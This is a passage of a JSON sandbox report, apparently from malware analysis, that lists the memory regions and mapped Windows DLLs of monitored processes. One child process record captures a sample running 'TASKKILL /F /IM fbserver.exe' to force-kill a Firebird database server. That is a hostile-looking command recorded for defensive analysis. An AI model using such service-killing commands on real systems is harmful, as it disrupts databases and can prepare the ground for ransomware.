{ "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2365", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:21.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2366", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:21.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_2367", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:01:21.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_2368", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:01:21.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 7077887, "entry_point": 0, "filename": null, "id": "region_2369", "name": "private_0x0000000000680000", "norm_filename": null, "region_type": "private_memory", "start_va": 6815744, "timestamp": "00:01:21.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33292288, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_2370", "name": "private_0x0000000001fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33292288, "timestamp": "00:01:21.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787699616, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2371", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:21.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2372", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:21.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2373", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:21.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1786404863, "entry_point": 1785919673, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2374", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:21.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1787559936, "type": "region", "version": 1 }, "end_va": 1787658239, "entry_point": 1787564853, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2375", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1787559936, "timestamp": "00:01:21.770", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM fbserver.exe /IM fbserver.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_16", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 16, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2376", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:22.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2377", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:22.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2378", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:22.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2379", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:22.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2380", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:22.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_2381", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:22.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_2382", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:22.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 7823359, "entry_point": 7756937, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2383", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 7733248, "timestamp": "00:01:22.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2384", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:22.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2385", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:22.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2386", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:22.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2387", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:22.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2388", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:22.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2389", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:22.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2390", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:22.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2391", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:22.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2392", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:22.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 0, "filename": null, "id": "region_2393", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:22.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2394", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:22.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2395", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:22.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2396", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:22.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2397", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:22.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2398", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:22.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2399", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:22.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2400", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:22.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_2401", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:01:22.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3305471, "entry_point": 2883584, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2402", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2883584, "timestamp": "00:01:22.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_2403", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:22.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1788391423, "entry_point": 1787433934, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2404", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:22.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788473343, "entry_point": 1788416673, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2405", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:22.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1788477440, "type": "region", "version": 1 }, "end_va": 1788514303, "entry_point": 1788482982, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2406", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1788477440, "timestamp": "00:01:22.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788542976, "type": "region", "version": 1 }, "end_va": 1788612607, "entry_point": 1788547840, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2407", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788542976, "timestamp": "00:01:22.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788891135, "entry_point": 1788679125, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2408", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:22.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2409", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:22.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2410", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:22.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2411", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:22.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2412", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:22.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2413", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:22.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2414", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:22.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2415", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:22.067", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2416", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:22.067", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2417", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:22.067", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2418", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:22.068", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2419", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:22.068", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2420", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:22.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2421", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:22.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2422", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:22.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2423", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:22.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2424", "name": "usp10.dll", "norm_filename": 